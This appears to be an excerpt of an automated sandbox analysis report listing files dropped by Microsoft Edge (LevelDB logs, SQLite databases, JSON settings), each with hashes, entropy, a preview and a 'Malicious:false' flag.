                                                                                                                                                      Preview:2024/12/04-07:58:13.093 1ef0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/04-07:58:13.094 1ef0 Recovering log #3.2024/12/04-07:58:13.094 1ef0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):334
                                                                                                                                                      Entropy (8bit):5.205878274041235
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:jjeiVq2Pwkn23oH+Tcwt8a2jMGIFUt8mjeUgZmw+mjegMnIkwOwkn23oH+Tcwt8N:2+vYfYeb8EFUt8Jd/+JgD5JfYeb8bJ
                                                                                                                                                      MD5:4D85212688C6CE21FEC5541F4A722F90
                                                                                                                                                      SHA1:772722C82E2887479166BF5124115549A0DF1F7F
                                                                                                                                                      SHA-256:AF48BB2664AA6FAD994BE286D30C42A854A7208F4A47BBECB51DD1F67D5FA48A
                                                                                                                                                      SHA-512:8A4806DBEBC9273471EC89819CA422073507801CF747A45496412CD677B8AE0569E0F7AC73097813D6AF66CFF33F09D91777E1833923D61A5BD9B2E4166FCE97
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:2024/12/04-07:58:12.756 1434 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/04-07:58:12.758 1434 Recovering log #3.2024/12/04-07:58:12.760 1434 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):334
                                                                                                                                                      Entropy (8bit):5.205878274041235
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:jjeiVq2Pwkn23oH+Tcwt8a2jMGIFUt8mjeUgZmw+mjegMnIkwOwkn23oH+Tcwt8N:2+vYfYeb8EFUt8Jd/+JgD5JfYeb8bJ
                                                                                                                                                      MD5:4D85212688C6CE21FEC5541F4A722F90
                                                                                                                                                      SHA1:772722C82E2887479166BF5124115549A0DF1F7F
                                                                                                                                                      SHA-256:AF48BB2664AA6FAD994BE286D30C42A854A7208F4A47BBECB51DD1F67D5FA48A
                                                                                                                                                      SHA-512:8A4806DBEBC9273471EC89819CA422073507801CF747A45496412CD677B8AE0569E0F7AC73097813D6AF66CFF33F09D91777E1833923D61A5BD9B2E4166FCE97
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:2024/12/04-07:58:12.756 1434 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/04-07:58:12.758 1434 Recovering log #3.2024/12/04-07:58:12.760 1434 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 28, cookie 0x1d, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):57344
                                                                                                                                                      Entropy (8bit):0.863060653641558
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:u7/KLPeymOT7ynlm+yKwt7izhGnvgbn8MouB6wznP:u74CnlmVizhGE7IwD
                                                                                                                                                      MD5:C681C90B3AAD7F7E4AF8664DE16971DF
                                                                                                                                                      SHA1:9F72588CEA6569261291B19E06043A1EFC3653BC
                                                                                                                                                      SHA-256:ADB987BF641B2531991B8DE5B10244C3FE1ACFA7AD7A61A65D2E2D8E7AB34C1D
                                                                                                                                                      SHA-512:4696BF334961E4C9757BAC40C41B4FBE3E0B9F821BD242CE6967B347053787BE54D1270D7166745126AFA42E8193AC2E695B0D8F11DE8F0B2876628B7C128942
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 11, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):45056
                                                                                                                                                      Entropy (8bit):0.40293591932113104
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TLVgTjDk5Yk8k+/kCkzD3zzbLGfIzLihje90xq/WMFFfeFzfXVVlYWOT/CUFSe:Tmo9n+8dv/qALihje9kqL42WOT/9F
                                                                                                                                                      MD5:ADC0CFB8A1A20DE2C4AB738B413CBEA4
                                                                                                                                                      SHA1:238EF489E5FDC6EBB36F09D415FB353350E7097B
                                                                                                                                                      SHA-256:7C071E36A64FB1881258712C9880F155D9CBAC693BADCC391A1CB110C257CC37
                                                                                                                                                      SHA-512:38C8B7293B8F7BEF03299BAFB981EEEE309945B1BDE26ACDAD6FDD63247C21CA04D493A1DDAFC3B9A1904EFED998E9C7C0C8E98506FD4AC0AB252DFF34566B66
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.......=......\.t.+.>...,...=........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2
                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:[]
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):881
                                                                                                                                                      Entropy (8bit):5.301244495740375
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:YXslZVMdBsCZFRudFGcscXyZFGJ/dbG7nby:YXsz8s2fcdscWgzbZ
                                                                                                                                                      MD5:2A374BAD9DDD9E7B81A33FE6C1FCF6D0
                                                                                                                                                      SHA1:D297033CEBF4F40936FBD0AEDB1D59E5D4F4FCE6
                                                                                                                                                      SHA-256:3AF1E8CDEC28616595199EE523CD77405BA97FA2517EFD056760B56B365762CD
                                                                                                                                                      SHA-512:C859FF573CECA184505919689E91EE275B66F145709AD73AA1D88D61C72574B0A33213F22D06B652D524DD9D4528C7664745BEA451F2A943F0C5E804601AD05E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380382697228753","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380382700268403","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380382721772636","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com"}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):40
                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2
                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:[]
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):22
                                                                                                                                                      Entropy (8bit):3.788754913993502
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:YWRAW4J2LSQ:YWyW5SQ
                                                                                                                                                      MD5:3BB76EC23C5506830EAD56540E06159F
                                                                                                                                                      SHA1:94695E47D907E559E91E677CEC4EB763DC0C5CA9
                                                                                                                                                      SHA-256:6B40F4AE548688A472BE3CA0C1B08ECF520B31E706FEC0F9793B4666134EBA06
                                                                                                                                                      SHA-512:307F9BD06CA5EE753ACDC450CF1599DFC8ED080D9A1B19D752DD9B7950377A5B04E44D374F12ED76ABD74961C2B1F8AD6C93E4663EA77F5D6E066570C1AA6BAD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"sts":[],"version":2}
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):111
                                                                                                                                                      Entropy (8bit):4.718418993774295
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
                                                                                                                                                      MD5:285252A2F6327D41EAB203DC2F402C67
                                                                                                                                                      SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
                                                                                                                                                      SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
                                                                                                                                                      SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):20480
                                                                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):61
                                                                                                                                                      Entropy (8bit):3.926136109079379
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                      MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                      SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                      SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                      SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):61
                                                                                                                                                      Entropy (8bit):3.926136109079379
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                      MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                      SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                      SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                      SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):61
                                                                                                                                                      Entropy (8bit):3.926136109079379
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                      MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                      SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                      SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                      SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):36864
                                                                                                                                                      Entropy (8bit):0.7604306509756348
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:TaIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBkzN:uIEumQv8m1ccnvS6yv
                                                                                                                                                      MD5:4967C468A330A7C66805858880882694
                                                                                                                                                      SHA1:DC85A64C97F48B87DA5194CF5242B3FCD3C79BD7
                                                                                                                                                      SHA-256:BDBDE7531038FE83B5D97B7FB1BA8926288DE316FE78D88D1EE6AA0A532D6991
                                                                                                                                                      SHA-512:2D55B7DE81A39982ADF224204399D901959071FADE107FAFB33C3B36823161365F7289B16A66B0EFBB8E88B8291B584D5DA36528B4A3BC20853BC60907C0DDDE
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2
                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:[]
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2
                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:[]
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2
                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:[]
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2
                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:[]
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):40
                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):203
                                                                                                                                                      Entropy (8bit):5.4042796420747425
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:YAQN1iL50xHA9vh8wXwlmUUAnIMp5sXX2SQ:Y45Sg9vt+UAnIXZQ
                                                                                                                                                      MD5:24D66E5F1B8C76C76511DA68057CDE5E
                                                                                                                                                      SHA1:70225FEC1AE3FEF8D8A767D9EA0B0E108BF8F10D
                                                                                                                                                      SHA-256:D5CB3A4A104E2EC4F13E8B4CDF3BD469E0AB638713928BEA1EAEAF03998B794C
                                                                                                                                                      SHA-512:1CA093B4BB4E0B3EE0B791AD0E6B39AC9640CEB6ED005BD10A10B4AF904858F4898D86D26B60B625CDA9425FF317C6B9FE0DF2E12C897A52720AF775B19491AA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"expect_ct":[],"sts":[{"expiry":1727869700.805692,"host":"dUymlFcJcEIuWrPNRCRXYtREHxXDHdPfT47kO1IQnQ0=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696333700.805702}],"version":2}
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):203
                                                                                                                                                      Entropy (8bit):5.4042796420747425
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:YAQN1iL50xHA9vh8wXwlmUUAnIMp5sXX2SQ:Y45Sg9vt+UAnIXZQ
                                                                                                                                                      MD5:24D66E5F1B8C76C76511DA68057CDE5E
                                                                                                                                                      SHA1:70225FEC1AE3FEF8D8A767D9EA0B0E108BF8F10D
                                                                                                                                                      SHA-256:D5CB3A4A104E2EC4F13E8B4CDF3BD469E0AB638713928BEA1EAEAF03998B794C
                                                                                                                                                      SHA-512:1CA093B4BB4E0B3EE0B791AD0E6B39AC9640CEB6ED005BD10A10B4AF904858F4898D86D26B60B625CDA9425FF317C6B9FE0DF2E12C897A52720AF775B19491AA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"expect_ct":[],"sts":[{"expiry":1727869700.805692,"host":"dUymlFcJcEIuWrPNRCRXYtREHxXDHdPfT47kO1IQnQ0=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696333700.805702}],"version":2}
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):36864
                                                                                                                                                      Entropy (8bit):0.36515621748816035
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                                                                      MD5:25363ADC3C9D98BAD1A33D0792405CBF
                                                                                                                                                      SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                                                                      SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                                                                      SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2
                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:[]
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2
                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:[]
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):20480
                                                                                                                                                      Entropy (8bit):0.46731661083066856
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:TL1QAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3is25q0S9K0xHZ75fOV:TLiOUOq0afDdWec9sJf5Q7J5fc
                                                                                                                                                      MD5:E93ACF0820CA08E5A5D2D159729F70E3
                                                                                                                                                      SHA1:2C1A4D4924B9AEC1A796F108607404B000877C5D
                                                                                                                                                      SHA-256:F2267FDA7F45499F7A01186B75CEFB799F8D2BC97E2E9B5068952D477294302C
                                                                                                                                                      SHA-512:3BF36C20E04DCF1C16DC794E272F82F68B0DE43F16B4A9746B63B6D6BBC953B00BD7111CDA7AFE85CEBB2C447145483A382B15E2B0A5B36026C3441635D4E50C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):6144
                                                                                                                                                      Entropy (8bit):0.8024617987340261
